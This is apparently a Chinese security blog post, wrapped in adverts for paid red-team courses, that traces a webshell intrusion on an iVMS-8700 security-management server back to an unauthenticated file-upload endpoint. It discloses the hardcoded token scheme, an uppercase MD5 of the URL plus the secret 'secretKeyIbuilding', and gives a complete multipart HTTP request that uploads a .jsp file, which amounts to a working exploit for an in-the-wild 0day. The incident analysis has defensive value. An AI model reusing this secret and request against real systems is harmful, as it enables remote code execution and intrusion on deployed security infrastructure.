嗨,朋友你好,这里是闪石星曜CyberSecurity。
(大家记得给公众号点个星标哦,实时获取最新干货不迷路~)
今天为大家带来的是【炼石计划@渗透红队攻防】内部圈子原创文章之某康 iVMS-8700 综合安防在野 0day 捕捉记录。内部课程文章部分分享给大家学习,如果你也想学习更多红队攻防技巧,欢迎加入我们。
【炼石计划@渗透红队攻防】
是一个专注渗透红队攻防的内部圈子,多维度分享和红队攻防息息相关的内容,包括但不限于 Java 代码审计,PHP 代码审计,Web进阶渗透,红队攻防实战总结,漏洞复现等内容。2023年核心主题是【红队攻防一百篇】,传递一手的红队攻防,黑灰对抗,护VV等实战经验,第一时间总结,第一时间反馈,让大家第一时间学习吸收到最新的技术,打破信息传递壁垒。
当然,内部圈子不仅有【渗透红队攻防实战 100 篇】的飞升期的武功秘籍,还有【Java安全基础 15 篇(已完成)】、【JavaWeb代码审计基础 15 篇(已完成)】、【PHP之WEB安全基础 13 篇(已完成)】、【Python基础 8 篇(已完成)】、【漏洞复现 50 篇(分享中)】、【CMS系统代码审计 10 套- 20 篇(分享中)】、【内部 CS 插件】等筑基期的武功秘籍。总之这里从基础到进阶都所有涉及,最终在实战秘籍中提升自己!
现仅需 133 元一年(自加入起计算),这点投资会让你有成倍的收获!
起因-日志分析
某次行业hw客户服务器说被人上shell了,看了下发现是哥斯拉默认密码,就直接通过shell连上服务器
观察一波,该系统是 Java 语言,Tomcat 中间件,于是先还原一波大黑客的攻击路径。
去到xxx/Tomcat/logs/目录下找 4.25 这个日期的日志
通过定位 webshell 的访问路径,可以看到在POST /eps/resourceOperations/upload.action 该接口后直接就getshell,然后就访问上传的webshell了
经过-漏洞分析
通过日志分析得到了攻击者的攻击路径,那么接下来就开始审计,进一步还原攻击者的路径
因为shell 是在eps目录下上的,所以直接在eps目录下搜索文件上传的关键字
发现一个上传接口,而且对文件名后缀没啥过滤
通过查看web.xml,所以最终采用了下面链接这种方式来访问。
http://xxxx/eps/api/resourceOperations/upload
尝试了一波,发现需要token
结果-权限绕过
通过搜索关键字,在epsWEB-INFlibcms-common-util-2.9.1-SNAPSHOT.jar定位到鉴权代码
token= http://xxxx/
要访问的接口拼接密钥 secretKeyIbuilding
比如需要访问
http://192.168.1.1:8888/eps/api/resourceOperations/upload
路径 则 token 为
http://192.168.1.1:8888/eps/api/resourceOperations/uploadsecretKeyIbuilding
的大写md5值
附上检测payload
POST /eps/api/resourceOperations/upload?token=xxxx HTTP/1.1
Host: x.x.x.x
Content-Length: 183
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGEJwjlojPo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundaryGEJwjlojPo
Content-Disposition: form-data; name="fileUploader"; filename="222.jsp"
Content-Type: image/jpeg
test
------WebKitFormBoundaryGEJwjlojPo--
内卷时刻
以下是我的三个内部圈子,已经都稳定运行一年了,不割韭菜,分享实打实的知识,大家可以根据自己的方向选择,来吧一起内卷。大家可点击下方链接获取详细介绍。
【炼石计划@Java代码审计】
一个专注 Java 代码审计,系统化从基础入门到实战提升学习 Java 代码审计的地方。这里不仅注重夯实基础,更加专注实战进阶。从基础概念知识开始学习,配合项目级系统实战,共六大学习阶段,约 150 篇原创教程,带你提升真正的 Java 代码审计技术!利用碎片化时间学习也会让你有不菲的收获,总之这里一定是你不错的选择。
现在一年仅需 133元,自从加入起计算,每天仅需三毛多。
【炼石计划@PHP代码审计】
一个专注 PHP 代码审计,系统化从基础入门到实战提升学习 PHP 代码审计的地方。这里不仅注重夯实基础,更加专注实战进阶。从基础概念知识开始学习,配合项目级系统实战演练,共六大学习阶段,一百二十余篇原创教程,带你提升真正的 PHP 代码审计技术!利用碎片化时间学习也会让你有不菲的收获,总之这里一定是你不错的选择。
加上 2023 年主题是【挖 0day,交 CNVD】,目标是带大家挖掘两中一高 CNVD 证书,激情碰撞下来,收获最多的一定是你!
现在一年仅需 133元,自从加入起计算,每天仅需两毛多。
【炼石计划@渗透红队攻防】
是一个专注渗透红队攻防的内部圈子,多维度分享和红队攻防息息相关的内容,包括但不限于 Java 代码审计,PHP 代码审计,Web进阶渗透,红队攻防实战总结,漏洞复现等内容。2023年核心主题是【红队攻防一百篇】,传递一手的红队攻防,黑灰对抗,护VV等实战经验,第一时间总结,第一时间反馈,让大家第一时间学习吸收到最新的技术,打破信息传递壁垒。
当然,内部圈子不仅有【渗透红队攻防实战 100 篇】的飞升期的武功秘籍,还有【Java安全基础 15 篇(已完成)】、【JavaWeb代码审计基础 15 篇(已完成)】、【PHP之WEB安全基础 13 篇(已完成)】、【Python基础 8 篇(已完成)】、【漏洞复现 50 篇(分享中)】、【CMS系统代码审计 10 套- 20 篇(分享中)】、【内部 CS 插件】等筑基期的武功秘籍。总之这里从基础到进阶都所有涉及,最终在实战秘籍中提升自己!
现在一年仅需 133元,自从加入起计算,每天仅需三毛多。
随着人数以及原创内容的增多,价格只增不减,
投资自己永远不会被甩下。
原文始发于微信公众号(闪石星曜CyberSecurity):某康 iVMS-8700 综合安防在野 0day 捕捉记录